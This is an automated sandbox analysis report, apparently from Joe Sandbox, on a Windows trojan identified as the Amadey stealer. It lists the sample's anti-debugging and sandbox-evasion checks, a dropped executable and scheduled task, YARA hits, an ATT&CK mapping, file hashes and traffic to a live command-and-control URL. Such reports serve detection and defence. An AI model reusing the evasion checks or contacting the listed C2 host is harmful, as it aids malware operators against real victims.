Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Code function: 0_2_04E20BA6 rdtsc

0_2_04E20BA6

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 2_2_00E5645B mov eax, dword ptr fs:[00000030h]		2_2_00E5645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 2_2_00E5A1C2 mov eax, dword ptr fs:[00000030h]		2_2_00E5A1C2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

Jump to behavior

Source: explorti.exe, explorti.exe, 00000008.00000002.1972526106.0000000001020000.00000040.00000001.01000000.00000008.sdmp

Binary or memory string: KProgram Manager

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 2_2_00E3D312 cpuid

2_2_00E3D312

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 2_2_00E3CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

2_2_00E3CB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 2.2.explorti.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.explorti.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000003.1931905598.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3855298883.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1468832489.0000000000901000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1972443019.0000000000E21000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1428535322.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1474858730.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	641 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	224 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	100%	Avira	TR/Crypt.TPM.Gen
SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://185.215.113.19/Vi9leo/index.phpv	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php:	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php1z&V	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpM	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpW	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php	100%	Avira URL Cloud	malware
http://185.215.113.19/Vi9leo/index.phpm32	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpheCounterMutex8	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpl	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php9	100%	Avira URL Cloud	phishing

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.phpheCounterMutex8	explorti.exe, 00000002.00000002.3856846494.000000000133E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpv	explorti.exe, 00000002.00000003.3071340441.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php1z&V	explorti.exe, 00000002.00000002.3856846494.0000000001372000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpW	explorti.exe, 00000002.00000003.3071340441.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php:	explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpm32	explorti.exe, 00000002.00000002.3856846494.000000000133E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php9	explorti.exe, 00000002.00000003.3071340441.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpl	explorti.exe, 00000002.00000003.3071340441.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000002.3856846494.0000000001398000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpM	explorti.exe, 00000002.00000003.3388620641.00000000013A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.19	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1483011
Start date and time:	2024-07-26 13:52:13 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/3@0/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe, PID 6536 because it is empty
Execution Graph export aborted for target explorti.exe, PID 1996 because there are no executed function
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe

Simulations

Behavior and APIs

Time	Type	Description
07:53:17	API Interceptor	12625710x Sleep call for process: explorti.exe modified
13:53:12	Task Scheduler	Run new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.19	LbMTyCFRzs.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php
	DHBIT8FeuO.exe	Get hash	malicious	Amadey	Browse	185.215.113.19/Vi9leo/index.php
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.19/Vi9leo/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	EXyAlLKIck.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	IRqsWvBBMc.exe	Get hash	malicious	Amadey, Vidar	Browse	185.215.113.16
	LbMTyCFRzs.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	file.exe	Get hash	malicious	Amadey, Babadeda, Stealc, Vidar	Browse	185.215.113.16
	DHBIT8FeuO.exe	Get hash	malicious	Amadey	Browse	185.215.113.19
	JGKjBsQrMc.exe	Get hash	malicious	Amadey, Babadeda, RedLine, Stealc, Vidar	Browse	185.215.113.16
	PE1dBCFKZv.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	random.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Python Stealer, Amadey, Babadeda, Monster Stealer, RedLine, Stealc, Vidar	Browse	185.215.113.16
	file.exe	Get hash	malicious	RedLine	Browse	185.215.113.67

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1920000
Entropy (8bit):	7.94897454903065
Encrypted:	false
SSDEEP:	24576:bcW1jg/Z+bPaeDOAIsfkRTePAFt2adNSUZBNMxsMFAbwfSQbcI+LWBMmQ4JX+ZGm:gmjglbsfkRmadNbqBFA9HCW4wF5uCb
MD5:	5AA3B4D694BC828650C63ADE641F4581
SHA1:	3F3E91F7B65BE4E4B24FD29EA837206C00D55FC3
SHA-256:	D3983E52C48A6F9844B5CA10248EE51B8A1F2BD6637243FF0384A92288572F61
SHA-512:	488700E399D0391FD10CD2889B4A046B1C2ED9046A70030C273BD401606AB9A5C216A5518E45573B8857AB6F8DCAFF33D064EE3EB6348238579EC57F6C28A00F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f.............................0L...........@..........................`L......s....@.................................W...k...........................H.L...............................L..................................................... . ............................@....rsrc...............................@....idata ............................@... .0+.........................@...eqezoorp.@....1..4..................@...vzestrad..... L......&..............@....taggant.0...0L.."...*..............@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\Tasks\explorti.job

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe
File Type:	data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	3.4509216553229543
Encrypted:	false
SSDEEP:	6:FZXUaL1UEZ+lX1cI1l6lm6tkHs+Zgty0l1Xyt0:zJBQ1cagSZgtV1Ct0
MD5:	501F8A6F285BC9015C8439374D5F8926
SHA1:	292FB332E2D6D68B7D8E00CAABD1812B10E42B00
SHA-256:	723DEEFD32B2B07784EFA086079CFF8694B89295D930AEAC0626C2DF8A57E2F5
SHA-512:	A115FDB3680A2026990D5F8CE1D99FB24A6339F7114575A0D3E18CCB404FFB571E53849800275FB105A8571C803CD7D09C422680B02C45DF0C5E6207472E4AC7
Malicious:	false
Reputation:	low
Preview:	....\|..j...F..#....xF.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........H.U.B.E.R.T.-.P.C.\.h.u.b.e.r.t...................0.................6.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.94897454903065
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe
File size:	1'920'000 bytes
MD5:	5aa3b4d694bc828650c63ade641f4581
SHA1:	3f3e91f7b65be4e4b24fd29ea837206c00d55fc3
SHA256:	d3983e52c48a6f9844b5ca10248ee51b8a1f2bd6637243ff0384a92288572f61
SHA512:	488700e399d0391fd10cd2889b4a046b1c2ed9046a70030c273bd401606ab9a5c216a5518e45573b8857ab6f8dcaff33d064ee3eb6348238579ec57f6c28a00f
SSDEEP:	24576:bcW1jg/Z+bPaeDOAIsfkRTePAFt2adNSUZBNMxsMFAbwfSQbcI+LWBMmQ4JX+ZGm:gmjglbsfkRmadNbqBFA9HCW4wF5uCb
TLSH:	F59533B31C5708ACEA576372D157C1D0E5A72427C73AE2B6012E9D39BD93CB1EB028D6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8c3000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FABC8E3983Ah
cvtpi2ps xmm3, qword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [edx], al
or al, byte ptr [eax]
add byte ptr [ecx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c1148	0x10	eqezoorp
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4c10f8	0x18	eqezoorp
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2dc00	667f7f604f56886577ac2ac7cfb759ef	False	0.99981856215847	data	7.984651828533471	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	787205a28c6aac0918d638283b62af25	False	0.580078125	data	4.509934801893229	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2b3000	0x200	cdc2e8eef31753a32c03bcd4a85ba9ce	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
eqezoorp	0x31e000	0x1a4000	0x1a3400	feacabef75cb2c4a7ef6efe7fd7d9434	False	0.994464981179189	data	7.952940556000888	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vzestrad	0x4c2000	0x1000	0x400	4475e598462e25581e8192d945f5e575	False	0.7763671875	data	6.121618329338541	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4c3000	0x3000	0x2200	2ca561ffb8837ebeeced04b4b4345781	False	0.07100183823529412	DOS executable (COM)	0.7550054296789814	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4c1158	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-26T13:53:22.368624+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49706	80	192.168.2.8	185.215.113.19
2024-07-26T13:53:19.998830+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49704	80	192.168.2.8	185.215.113.19
2024-07-26T13:53:21.165480+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49705	80	192.168.2.8	185.215.113.19
2024-07-26T13:53:30.447548+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49712	40.68.123.157	192.168.2.8
2024-07-26T13:54:09.040341+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49749	20.114.59.183	192.168.2.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 13:53:19.242698908 CEST	49704	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:53:19.247663021 CEST	80	49704	185.215.113.19	192.168.2.8
Jul 26, 2024 13:53:19.247741938 CEST	49704	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:53:19.247950077 CEST	49704	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:53:19.253866911 CEST	80	49704	185.215.113.19	192.168.2.8
Jul 26, 2024 13:53:19.997610092 CEST	80	49704	185.215.113.19	192.168.2.8
Jul 26, 2024 13:53:19.998830080 CEST	49704	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:53:20.000714064 CEST	49704	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:53:20.005712986 CEST	80	49704	185.215.113.19	192.168.2.8
Jul 26, 2024 13:53:20.247251987 CEST	80	49704	185.215.113.19	192.168.2.8
Jul 26, 2024 13:53:20.250880957 CEST	49704	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:53:20.355281115 CEST	49704	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:53:20.356515884 CEST	49705	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:53:20.360693932 CEST	80	49704	185.215.113.19	192.168.2.8
Jul 26, 2024 13:53:20.362339973 CEST	80	49705	185.215.113.19	192.168.2.8
Jul 26, 2024 13:53:20.362438917 CEST	49704	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:53:20.362495899 CEST	49705	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:53:20.362703085 CEST	49705	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:53:20.368531942 CEST	80	49705	185.215.113.19	192.168.2.8
Jul 26, 2024 13:53:21.165393114 CEST	80	49705	185.215.113.19	192.168.2.8
Jul 26, 2024 13:53:21.165479898 CEST	49705	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:53:21.167192936 CEST	49705	80	192.168.2.8	185.215.113.19
Jul 26, 2024 13:53:21.172408104 CEST	80	49705	185.215.113.19	192.168.2.8
